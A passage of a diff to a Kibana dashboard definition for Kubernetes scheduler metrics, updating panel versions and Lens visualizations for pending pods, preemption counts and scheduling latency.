+ "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": true, - "syncCursor": true, - "syncTooltips": false, - "useMargins": true + "title": "Pending pods" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "125ec894-444e-486b-a9c8-7205cde12a7e", + "w": 8, + "x": 13, + "y": 6 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "panelIndex": 
"125ec894-444e-486b-a9c8-7205cde12a7e", + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-8cad09ad-7860-45ac-aaad-7b94af09c33d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "8cad09ad-7860-45ac-aaad-7b94af09c33d": { + "columnOrder": [ + "7bce9fb8-18e2-4eb4-a7d7-891cc72a3c51", + "7bce9fb8-18e2-4eb4-a7d7-891cc72a3c51X0" + ], + "columns": { + "7bce9fb8-18e2-4eb4-a7d7-891cc72a3c51": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Preemption attempts", + "operationType": "formula", + "params": { + "formula": "last_value(kubernetes.scheduler.scheduling.preemption.attempts.count)", + "isFormulaBroken": false + }, + "references": [ + "7bce9fb8-18e2-4eb4-a7d7-891cc72a3c51X0" + ], + "scale": "ratio" }, - "description": "", - "id": "", - "params": { - "fontSize": 12, - "markdown": "### Scheduler\n\nThis dashboard collects metrics from [kube scheduler](https://kubernetes.io/docs/concepts/overview/components/#kube-scheduler) endpoint. Its purpose is to give an overview of what is happening inside it through this component metrics and detect problems that might be happening. \n\n**WARNING**: This dataset **requires access** to the Kubernetes scheduler endpoint. Refer [here](https://docs.elastic.co/en/integrations/kubernetes#scheduler-and-controllermanager) to learn how to enable it. 
In some \"As a Service\" Kubernetes implementations, like GKE or AKS, it is **not possible** to access its metrics.", - "openLinksInNewTab": false - }, - "title": "", - "type": "markdown", - "uiState": {} + "7bce9fb8-18e2-4eb4-a7d7-891cc72a3c51X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.scheduling.preemption.attempts.count: *" + }, + "isBucketed": false, + "label": "Part of Preemption attempts", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.scheduling.preemption.attempts.count" + } + }, + "incompleteColumns": {}, + "sampling": 1 } + } }, - "gridData": { - "h": 12, - "i": "c13eb504-6afb-4fa5-8a7d-a75c5fee15b7", - "w": 13, - "x": 0, - "y": 0 - }, - "panelIndex": "c13eb504-6afb-4fa5-8a7d-a75c5fee15b7", - "type": "visualization", - "version": "8.6.0" + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layerId": "8cad09ad-7860-45ac-aaad-7b94af09c33d", + "layerType": "data", + "metricAccessor": "7bce9fb8-18e2-4eb4-a7d7-891cc72a3c51" + } }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "params": { - "axis_formatter": "number", - "axis_position": "left", - "axis_scale": "normal", - "background_color": "rgba(203,228,249,1)", - "drop_last_bucket": 0, - "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", - "index_pattern_ref_name": "metrics_ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd_0_index_pattern", - "interval": "", - "isModelInvalid": false, - "markdown": "Scheduling", - "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI 
Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", - "markdown_vertical_align": "middle", - "max_lines_legend": 1, - "series": [ - { - "axis_position": "right", - "chart_type": "line", - "color": "#68BC00", - "fill": 0.5, - "formatter": "default", - "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", - "line_width": 1, - "metrics": [ - { - "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", - "type": "count" - } - ], - "override_index_pattern": 0, - "palette": { - "name": "default", - "type": "palette" - }, - "point_size": 1, - "separate_axis": 0, - "series_drop_last_bucket": 0, - "split_mode": "everything", - "stacked": "none", - "time_range_mode": "entire_time_range" - } - ], - "show_grid": 1, - "show_legend": 1, - "time_field": "", - "time_range_mode": "entire_time_range", - "tooltip_mode": "show_all", - "truncate_legend": 1, - "type": "markdown", - "use_kibana_indexes": true + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + } + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "e6506b77-2e3b-4bfa-831a-8a5daada553b", + "w": 8, + "x": 21, + "y": 6 + }, + "panelIndex": "e6506b77-2e3b-4bfa-831a-8a5daada553b", + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-af585c84-2ebf-42a3-9073-4d76e8b2610d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "af585c84-2ebf-42a3-9073-4d76e8b2610d": { + "columnOrder": [ + "19819472-270b-4678-8367-9d09f29ae509", + "19819472-270b-4678-8367-9d09f29ae509X0" + ], + "columns": { + "19819472-270b-4678-8367-9d09f29ae509": { + 
"customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Preemption victims", + "operationType": "formula", + "params": { + "formula": "last_value(kubernetes.scheduler.scheduling.preemption.victims.count)", + "isFormulaBroken": false + }, + "references": [ + "19819472-270b-4678-8367-9d09f29ae509X0" + ], + "scale": "ratio" }, - "title": "", - "type": "metrics", - "uiState": {} + "19819472-270b-4678-8367-9d09f29ae509X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.scheduling.preemption.victims.count: *" + }, + "isBucketed": false, + "label": "Part of Preemption victims", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.scheduling.preemption.victims.count" + } + }, + "incompleteColumns": {}, + "sampling": 1 } + } }, - "gridData": { - "h": 3, - "i": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd", - "w": 35, - "x": 13, - "y": 0 - }, - "panelIndex": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd", - "title": "", - "type": "visualization", - "version": "8.6.0" + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layerId": "af585c84-2ebf-42a3-9073-4d76e8b2610d", + "layerType": "data", + "metricAccessor": "19819472-270b-4678-8367-9d09f29ae509" + } }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "id": "", - "params": { - "fontSize": 12, - "markdown": "**NOTE**: This section is meant for **one** cluster. Please, filter above. 
Otherwise, results might be inaccurate.", - "openLinksInNewTab": false + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + } + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "181a3fe5-e5b5-472e-98af-ea4aaadc3109", + "w": 24, + "x": 0, + "y": 12 + }, + "panelIndex": "181a3fe5-e5b5-472e-98af-ea4aaadc3109", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-c0fe3677-6a5b-4340-8ad0-d8e31b042fe8", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c038d00b-5e03-420e-9c45-a8aea3c41f99", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "c0fe3677-6a5b-4340-8ad0-d8e31b042fe8": { + "columnOrder": [ + "51038211-b99f-4527-b1f1-cab52e7a4902", + "3ef7d43e-6806-4ae6-bd67-38a7c29d0f7c", + "d23c570b-1f9a-4ea6-be40-b6860fff0d75", + "d23c570b-1f9a-4ea6-be40-b6860fff0d75X0", + "d23c570b-1f9a-4ea6-be40-b6860fff0d75X2", + "d23c570b-1f9a-4ea6-be40-b6860fff0d75X1" + ], + "columns": { + "3ef7d43e-6806-4ae6-bd67-38a7c29d0f7c": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 3, - "i": "a47d16df-1a5a-49e1-9a33-dba87c371904", - "w": 16, - "x": 13, - "y": 3 - }, - "panelIndex": "a47d16df-1a5a-49e1-9a33-dba87c371904", - "type": "visualization", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-0c578d26-c937-4b73-a3a6-e15ebd5854e6", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - 
"datasourceStates": { - "formBased": { - "layers": { - "0c578d26-c937-4b73-a3a6-e15ebd5854e6": { - "columnOrder": [ - "51d8044e-b2ce-4afa-bca8-4898ee203019", - "680c2d97-35c9-4804-9c57-06645378bef4", - "3309a725-61ed-41e9-99cf-c37888da689b" - ], - "columns": { - "3309a725-61ed-41e9-99cf-c37888da689b": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.scheduling.pending.pods.count: *" - }, - "isBucketed": false, - "label": "Total", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.scheduling.pending.pods.count" - }, - "51d8044e-b2ce-4afa-bca8-4898ee203019": { - "customLabel": false, - "dataType": "string", - "isBucketed": true, - "label": "Top 3 values of kubernetes.scheduler.queue", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "3309a725-61ed-41e9-99cf-c37888da689b", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "kubernetes.scheduler.queue" - }, - "680c2d97-35c9-4804-9c57-06645378bef4": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Scheduler node", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "3309a725-61ed-41e9-99cf-c37888da689b", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "host.name" - } - }, - "incompleteColumns": {} - } - } - } + "51038211-b99f-4527-b1f1-cab52e7a4902": { + "dataType": "string", + "isBucketed": true, + "label": "Top 3 values of host.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [], - 
"internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "columns": [ - { - "alignment": "center", - "columnId": "3309a725-61ed-41e9-99cf-c37888da689b" - }, - { - "alignment": "center", - "columnId": "680c2d97-35c9-4804-9c57-06645378bef4", - "isTransposed": false - }, - { - "columnId": "51d8044e-b2ce-4afa-bca8-4898ee203019", - "isTransposed": true - } - ], - "headerRowHeight": "auto", - "layerId": "0c578d26-c937-4b73-a3a6-e15ebd5854e6", - "layerType": "data", - "rowHeight": "auto" - } + "size": 3 + }, + "scale": "ordinal", + "sourceField": "host.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsDatatable" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 9, - "i": "a2b844d8-11e3-4469-af4b-744d33b603ad", - "w": 19, - "x": 29, - "y": 3 - }, - "panelIndex": "a2b844d8-11e3-4469-af4b-744d33b603ad", - "title": "Pending pods", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-8cad09ad-7860-45ac-aaad-7b94af09c33d", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "8cad09ad-7860-45ac-aaad-7b94af09c33d": { - "columnOrder": [ - "7bce9fb8-18e2-4eb4-a7d7-891cc72a3c51", - "7bce9fb8-18e2-4eb4-a7d7-891cc72a3c51X0" - ], - "columns": { - "7bce9fb8-18e2-4eb4-a7d7-891cc72a3c51": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Preemption attempts", - "operationType": "formula", - "params": { - "formula": "last_value(kubernetes.scheduler.scheduling.preemption.attempts.count)", - "isFormulaBroken": false - }, - "references": [ - "7bce9fb8-18e2-4eb4-a7d7-891cc72a3c51X0" - ], - "scale": "ratio" - }, - "7bce9fb8-18e2-4eb4-a7d7-891cc72a3c51X0": { - 
"customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.scheduling.preemption.attempts.count: *" - }, - "isBucketed": false, - "label": "Part of Preemption attempts", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.scheduling.preemption.attempts.count" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } + "d23c570b-1f9a-4ea6-be40-b6860fff0d75": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Average latency", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "ms" + } }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "layerId": "8cad09ad-7860-45ac-aaad-7b94af09c33d", - "layerType": "data", - "metricAccessor": "7bce9fb8-18e2-4eb4-a7d7-891cc72a3c51" - } + "formula": "last_value(kubernetes.scheduler.scheduling.attempts.duration.us.sum)/pick_max(last_value(kubernetes.scheduler.scheduling.attempts.duration.us.count),1)/1000", + "isFormulaBroken": false + }, + "references": [ + "d23c570b-1f9a-4ea6-be40-b6860fff0d75X2" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 6, - "i": "125ec894-444e-486b-a9c8-7205cde12a7e", - "w": 8, - "x": 13, - "y": 6 - }, - "panelIndex": "125ec894-444e-486b-a9c8-7205cde12a7e", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-af585c84-2ebf-42a3-9073-4d76e8b2610d", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - 
"af585c84-2ebf-42a3-9073-4d76e8b2610d": { - "columnOrder": [ - "19819472-270b-4678-8367-9d09f29ae509", - "19819472-270b-4678-8367-9d09f29ae509X0" - ], - "columns": { - "19819472-270b-4678-8367-9d09f29ae509": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Preemption victims", - "operationType": "formula", - "params": { - "formula": "last_value(kubernetes.scheduler.scheduling.preemption.victims.count)", - "isFormulaBroken": false - }, - "references": [ - "19819472-270b-4678-8367-9d09f29ae509X0" - ], - "scale": "ratio" - }, - "19819472-270b-4678-8367-9d09f29ae509X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.scheduling.preemption.victims.count: *" - }, - "isBucketed": false, - "label": "Part of Preemption victims", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.scheduling.preemption.victims.count" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } + "d23c570b-1f9a-4ea6-be40-b6860fff0d75X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.scheduling.attempts.duration.us.sum: *" + }, + "isBucketed": false, + "label": "Part of Average latency", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.scheduling.attempts.duration.us.sum" + }, + "d23c570b-1f9a-4ea6-be40-b6860fff0d75X1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.scheduling.attempts.duration.us.count: *" + }, + "isBucketed": false, + "label": "Part of Average latency", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.scheduling.attempts.duration.us.count" + }, + 
"d23c570b-1f9a-4ea6-be40-b6860fff0d75X2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Average latency", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + { + "args": [ + "d23c570b-1f9a-4ea6-be40-b6860fff0d75X0", + { + "args": [ + "d23c570b-1f9a-4ea6-be40-b6860fff0d75X1", + 1 + ], + "location": { + "max": 151, + "min": 69 + }, + "name": "pick_max", + "text": "pick_max(last_value(kubernetes.scheduler.scheduling.attempts.duration.us.count),1)", + "type": "function" } + ], + "name": "divide", + "type": "function" }, - "textBased": { - "layers": {} - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "layerId": "af585c84-2ebf-42a3-9073-4d76e8b2610d", - "layerType": "data", - "metricAccessor": "19819472-270b-4678-8367-9d09f29ae509" + 1000 + ], + "location": { + "max": 156, + "min": 0 + }, + "name": "divide", + "text": "last_value(kubernetes.scheduler.scheduling.attempts.duration.us.sum)/pick_max(last_value(kubernetes.scheduler.scheduling.attempts.duration.us.count),1)/1000", + "type": "function" } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + }, + "references": [ + "d23c570b-1f9a-4ea6-be40-b6860fff0d75X0", + "d23c570b-1f9a-4ea6-be40-b6860fff0d75X1" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "c038d00b-5e03-420e-9c45-a8aea3c41f99", + "key": "kubernetes.scheduler.scheduling.attempts.duration.us.bucket.+Inf", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.scheduler.scheduling.attempts.duration.us.bucket.+Inf" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + 
"axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 6, - "i": "e6506b77-2e3b-4bfa-831a-8a5daada553b", - "w": 8, - "x": 21, - "y": 6 + "layers": [ + { + "accessors": [ + "d23c570b-1f9a-4ea6-be40-b6860fff0d75" + ], + "layerId": "c0fe3677-6a5b-4340-8ad0-d8e31b042fe8", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "51038211-b99f-4527-b1f1-cab52e7a4902", + "xAccessor": "3ef7d43e-6806-4ae6-bd67-38a7c29d0f7c" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false }, - "panelIndex": "e6506b77-2e3b-4bfa-831a-8a5daada553b", - "type": "lens", - "version": "8.6.0" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-c0fe3677-6a5b-4340-8ad0-d8e31b042fe8", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Average scheduling attempt latency" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "d35d8849-89ba-42b8-8120-c14b087f9690", + "w": 24, + "x": 24, + "y": 12 + }, + "panelIndex": "d35d8849-89ba-42b8-8120-c14b087f9690", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-2b43c72b-5964-4c48-8239-72a42fbe334f", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "2b43c72b-5964-4c48-8239-72a42fbe334f": { + "columnOrder": [ + "9a10de81-8e85-4356-8381-5cd24bd4f88e", + "afa79db7-0c03-40d0-a80b-6bf59b9a4925", + "46b12a48-f8b8-42ca-bfd6-adec41da55ed", + 
"46b12a48-f8b8-42ca-bfd6-adec41da55edX0", + "46b12a48-f8b8-42ca-bfd6-adec41da55edX1" + ], + "columns": { + "46b12a48-f8b8-42ca-bfd6-adec41da55ed": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Attempts", + "operationType": "formula", + "params": { + "formula": "counter_rate(last_value(kubernetes.scheduler.scheduling.attempts.duration.us.sum))", + "isFormulaBroken": false + }, + "references": [ + "46b12a48-f8b8-42ca-bfd6-adec41da55edX1" + ], + "scale": "ratio", + "timeScale": "s" + }, + "46b12a48-f8b8-42ca-bfd6-adec41da55edX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.scheduling.attempts.duration.us.sum: *" + }, + "isBucketed": false, + "label": "Part of Attempts", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.scheduling.attempts.duration.us.sum" + }, + "46b12a48-f8b8-42ca-bfd6-adec41da55edX1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Attempts", + "operationType": "counter_rate", + "references": [ + "46b12a48-f8b8-42ca-bfd6-adec41da55edX0" + ], + "scale": "ratio", + "timeScale": "s" + }, + "9a10de81-8e85-4356-8381-5cd24bd4f88e": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of kubernetes.scheduler.result + 1 other", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - { - "id": "metrics-*", - "name": "c038d00b-5e03-420e-9c45-a8aea3c41f99", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "c0fe3677-6a5b-4340-8ad0-d8e31b042fe8": { - "columnOrder": [ - "51038211-b99f-4527-b1f1-cab52e7a4902", - "3ef7d43e-6806-4ae6-bd67-38a7c29d0f7c", - "d23c570b-1f9a-4ea6-be40-b6860fff0d75", - "d23c570b-1f9a-4ea6-be40-b6860fff0d75X0", - 
"d23c570b-1f9a-4ea6-be40-b6860fff0d75X2", - "d23c570b-1f9a-4ea6-be40-b6860fff0d75X1" - ], - "columns": { - "3ef7d43e-6806-4ae6-bd67-38a7c29d0f7c": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "51038211-b99f-4527-b1f1-cab52e7a4902": { - "dataType": "string", - "isBucketed": true, - "label": "Top 3 values of host.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "host.name" - }, - "d23c570b-1f9a-4ea6-be40-b6860fff0d75": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Average latency", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "ms" - } - }, - "formula": "last_value(kubernetes.scheduler.scheduling.attempts.duration.us.sum)/pick_max(last_value(kubernetes.scheduler.scheduling.attempts.duration.us.count),1)/1000", - "isFormulaBroken": false - }, - "references": [ - "d23c570b-1f9a-4ea6-be40-b6860fff0d75X2" - ], - "scale": "ratio" - }, - "d23c570b-1f9a-4ea6-be40-b6860fff0d75X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.scheduling.attempts.duration.us.sum: *" - }, - "isBucketed": false, - "label": "Part of Average latency", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.scheduling.attempts.duration.us.sum" - }, - "d23c570b-1f9a-4ea6-be40-b6860fff0d75X1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": 
"kubernetes.scheduler.scheduling.attempts.duration.us.count: *" - }, - "isBucketed": false, - "label": "Part of Average latency", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.scheduling.attempts.duration.us.count" - }, - "d23c570b-1f9a-4ea6-be40-b6860fff0d75X2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Average latency", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - { - "args": [ - "d23c570b-1f9a-4ea6-be40-b6860fff0d75X0", - { - "args": [ - "d23c570b-1f9a-4ea6-be40-b6860fff0d75X1", - 1 - ], - "location": { - "max": 151, - "min": 69 - }, - "name": "pick_max", - "text": "pick_max(last_value(kubernetes.scheduler.scheduling.attempts.duration.us.count),1)", - "type": "function" - } - ], - "name": "divide", - "type": "function" - }, - 1000 - ], - "location": { - "max": 156, - "min": 0 - }, - "name": "divide", - "text": "last_value(kubernetes.scheduler.scheduling.attempts.duration.us.sum)/pick_max(last_value(kubernetes.scheduler.scheduling.attempts.duration.us.count),1)/1000", - "type": "function" - } - }, - "references": [ - "d23c570b-1f9a-4ea6-be40-b6860fff0d75X0", - "d23c570b-1f9a-4ea6-be40-b6860fff0d75X1" - ], - "scale": "ratio" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "c038d00b-5e03-420e-9c45-a8aea3c41f99", - "key": "kubernetes.scheduler.scheduling.attempts.duration.us.bucket.+Inf", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.scheduler.scheduling.attempts.duration.us.bucket.+Inf" - } - } - } + "secondaryFields": [ + "host.name" ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, 
- "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "d23c570b-1f9a-4ea6-be40-b6860fff0d75" - ], - "layerId": "c0fe3677-6a5b-4340-8ad0-d8e31b042fe8", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "51038211-b99f-4527-b1f1-cab52e7a4902", - "xAccessor": "3ef7d43e-6806-4ae6-bd67-38a7c29d0f7c" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - "shouldTruncate": false - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } + "size": 3 + }, + "scale": "ordinal", + "sourceField": "kubernetes.scheduler.result" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "afa79db7-0c03-40d0-a80b-6bf59b9a4925": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "30s" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 14, - "i": "181a3fe5-e5b5-472e-98af-ea4aaadc3109", - "w": 24, - "x": 0, - "y": 12 + "layers": [ + { + "accessors": [ + "46b12a48-f8b8-42ca-bfd6-adec41da55ed" + ], + "layerId": "2b43c72b-5964-4c48-8239-72a42fbe334f", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "9a10de81-8e85-4356-8381-5cd24bd4f88e", + "xAccessor": "afa79db7-0c03-40d0-a80b-6bf59b9a4925" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": 
